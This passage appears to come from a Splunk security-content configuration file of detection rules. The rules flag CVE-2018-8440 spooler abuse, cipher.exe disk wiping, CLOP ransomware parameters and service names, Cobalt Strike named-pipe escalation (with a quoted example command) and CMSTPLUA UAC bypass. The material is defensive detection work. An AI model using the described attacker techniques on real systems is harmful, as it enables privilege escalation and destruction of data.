realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*whoami*" Processes.process = "*/group*" Processes.process = "* find *" Processes.process = "*12288*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `check_elevated_cmd_using_whoami_filter`

[ESCU - Child Processes of Spoolsv exe - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for child processes of spoolsv.exe. This activity is associated with a POC privilege-escalation exploit associated with CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for child processes of spoolsv.exe. This activity is associated with a POC privilege-escalation exploit associated with CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Some legitimate printer-related processes may show up as children of spoolsv.exe. You should confirm that any such activity is legitimate; it may then be added as an exclusion in the search.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Child Processes of Spoolsv exe - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Child Processes of Spoolsv exe - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2018-8440"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for child processes of spoolsv.exe. This activity is associated with a POC privilege-escalation exploit associated with CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM.
action.notable.param.rule_title = Child Processes of Spoolsv exe
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe AND Processes.process_name!=regsvr32.exe by Processes.dest Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `child_processes_of_spoolsv_exe_filter`

[ESCU - Clear Unallocated Sector Using Cipher App - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects execution of `cipher.exe` to clear the unallocated sectors of a specific disk. This technique was seen in some ransomware to make it impossible to forensically recover deleted files.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects execution of `cipher.exe` to clear the unallocated sectors of a specific disk. This technique was seen in some ransomware to make it impossible to forensically recover deleted files.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may execute this app to manage disks.
action.escu.creation_date = 2021-06-10
action.escu.modification_date = 2021-06-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Clear Unallocated Sector Using Cipher App - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to clear the unallocated sectors of a specific disk.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Clear Unallocated Sector Using Cipher App - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects execution of `cipher.exe` to clear the unallocated sectors of a specific disk. This technique was seen in some ransomware to make it impossible to forensically recover deleted files.
action.notable.param.rule_title = Clear Unallocated Sector Using Cipher App
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cipher.exe" Processes.process = "*/w:*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clear_unallocated_sector_using_cipher_app_filter`

[ESCU - Clop Common Exec Parameter - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic is designed to identify a CLOP ransomware variant that uses arguments to execute its main code or a feature of its code. In this variant, if the parameter is "runrun", CLOP ransomware will try to encrypt files in network shares, and if it is "temp.dat", it will try to read from a stream, pipe or file and start encrypting files within the infected local machine. This technique can also be identified as an anti-sandbox technique that makes its code non-responsive, since it waits for a parameter in order to execute properly.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic is designed to identify a CLOP ransomware variant that uses arguments to execute its main code or a feature of its code. In this variant, if the parameter is "runrun", CLOP ransomware will try to encrypt files in network shares, and if it is "temp.dat", it will try to read from a stream, pipe or file and start encrypting files within the infected local machine. This technique can also be identified as an anti-sandbox technique that makes its code non-responsive, since it waits for a parameter in order to execute properly.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Operators can execute third party tools using these parameters.
action.escu.creation_date = 2023-03-17
action.escu.modification_date = 2023-03-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - Clop Common Exec Parameter - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Clop Ransomware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ using arguments to execute its main code or a feature of its code, related to Clop ransomware.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 100}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Clop Common Exec Parameter - Rule
action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic is designed to identify a CLOP ransomware variant that uses arguments to execute its main code or a feature of its code. In this variant, if the parameter is "runrun", CLOP ransomware will try to encrypt files in network shares, and if it is "temp.dat", it will try to read from a stream, pipe or file and start encrypting files within the infected local machine. This technique can also be identified as an anti-sandbox technique that makes its code non-responsive, since it waits for a parameter in order to execute properly.
action.notable.param.rule_title = Clop Common Exec Parameter
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name != "*temp.dat*" Processes.process = "*runrun*" OR Processes.process = "*temp.dat*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_common_exec_parameter_filter`

[ESCU - Clop Ransomware Known Service Name - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection identifies the common service name created by the CLOP ransomware as part of its persistence and high-privilege code execution on the infected machine. Usually CLOP ransomware uses the StartServiceCtrlDispatcherW API when creating this service entry.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies the common service name created by the CLOP ransomware as part of its persistence and high-privilege code execution on the infected machine. Usually CLOP ransomware uses the StartServiceCtrlDispatcherW API when creating this service entry.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Service Name, Service File Name, Service Start Type, and Service Type from your endpoints.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-03-17
action.escu.modification_date = 2021-03-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - Clop Ransomware Known Service Name - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Clop Ransomware"]
action.risk = 1
action.risk.param._risk_message = An instance of a known Clop Ransomware Service Name detected on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Clop Ransomware Known Service Name - Rule
action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection identifies the common service name created by the CLOP ransomware as part of its persistence and high-privilege code execution on the infected machine. Usually CLOP ransomware uses the StartServiceCtrlDispatcherW API when creating this service entry.
action.notable.param.rule_title = Clop Ransomware Known Service Name
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_system` EventCode=7045 Service_Name IN ("SecurityCenterIBM", "WinCheckDRVs") | stats count min(_time) as firstTime max(_time) as lastTime by dest EventCode Service_File_Name Service_Name Service_Start_Type Service_Type | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_ransomware_known_service_name_filter`

[ESCU - CMD Carry Out String Command Parameter - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware executing batch commands through a different shell, such as PowerShell, or a process other than `cmd.exe`. This is a good hunting query for suspicious command lines made by a script or a related process that executes them.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware executing batch commands through a different shell, such as PowerShell, or a process other than `cmd.exe`. This is a good hunting query for suspicious command lines made by a script or a related process that executes them.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be high based on legitimate scripted code in any environment. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - CMD Carry Out String Command Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AsyncRAT", "Winter Vivern", "WhisperGate", "Living Off The Land", "DarkGate Malware", "ProxyNotShell", "Log4Shell CVE-2021-44228", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "IcedID", "Chaos Ransomware", "PlugX", "Azorult", "Qakbot", "Hermetic Wiper", "Warzone RAT", "DarkCrystal RAT", "CISA AA23-347A", "Data Destruction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CMD Carry Out String Command Parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Winter Vivern", 
"WhisperGate", "Living Off The Land", "DarkGate Malware", "ProxyNotShell", "Log4Shell CVE-2021-44228", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "IcedID", "Chaos Ransomware", "PlugX", "Azorult", "Qakbot", "Hermetic Wiper", "Warzone RAT", "DarkCrystal RAT", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-44228"], "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` AND Processes.process="* /c*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_carry_out_string_command_parameter_filter` [ESCU - CMD Echo Pipe - Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\.\Pipe\5erg53`. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1059.003", "T1543.003", "T1543"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\.\Pipe\5erg53`. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. It is possible filtering may be required to ensure fidelity. 
action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - CMD Echo Pipe - Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ potentially performing privilege escalation using named pipes related to Cobalt Strike and other frameworks. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CMD Echo Pipe - Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1059.003", "T1543.003", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary 
will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\.\Pipe\5erg53`. action.notable.param.rule_title = CMD Echo Pipe - Escalation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter` [ESCU - Cmdline Tool Not Executed In CMD Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning `ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administrator.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning `ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administrator. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated host discovery application that may generate false positives. Filter as needed.
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Cmdline Tool Not Executed In CMD Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Volt Typhoon", "Rhysida Ransomware", "FIN7", "DarkGate Malware", "Qakbot", "CISA AA22-277A", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = A non-standard parent process $parent_process_name$ spawned child process $process_name$ to execute command-line tool on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cmdline Tool Not Executed In CMD Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["Volt Typhoon", "Rhysida Ransomware", "FIN7", "DarkGate Malware", "Qakbot", "CISA AA22-277A", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning 
`ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administrator. action.notable.param.rule_title = Cmdline Tool Not Executed In CMD Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "ipconfig.exe" OR Processes.process_name = "systeminfo.exe" OR Processes.process_name = "net.exe" OR Processes.process_name = "net1.exe" OR Processes.process_name = "arp.exe" OR Processes.process_name = "nslookup.exe" OR Processes.process_name = "route.exe" OR Processes.process_name = "netstat.exe" OR Processes.process_name = "whoami.exe") AND NOT (Processes.parent_process_name = "cmd.exe" OR Processes.parent_process_name = "powershell*" OR Processes.parent_process_name="pwsh.exe" OR Processes.parent_process_name = "explorer.exe") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmdline_tool_not_executed_in_cmd_shell_filter` [ESCU - CMLUA Or CMSTPLUA UAC Bypass - Rule] action.escu = 0
action.escu.enabled = 1 description = The following analytic detects a potential process using a COM object such as CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges for its running process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a potential process using a COM object such as CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges for its running process. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and imageloaded executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Legitimate Windows applications that are not on the list may load this DLL. Filter as needed.
action.escu.creation_date = 2021-05-13 action.escu.modification_date = 2021-05-13 action.escu.confidence = high action.escu.full_search_name = ESCU - CMLUA Or CMSTPLUA UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CMLUA Or CMSTPLUA UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a potential process using a COM object such as CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges for its running process.
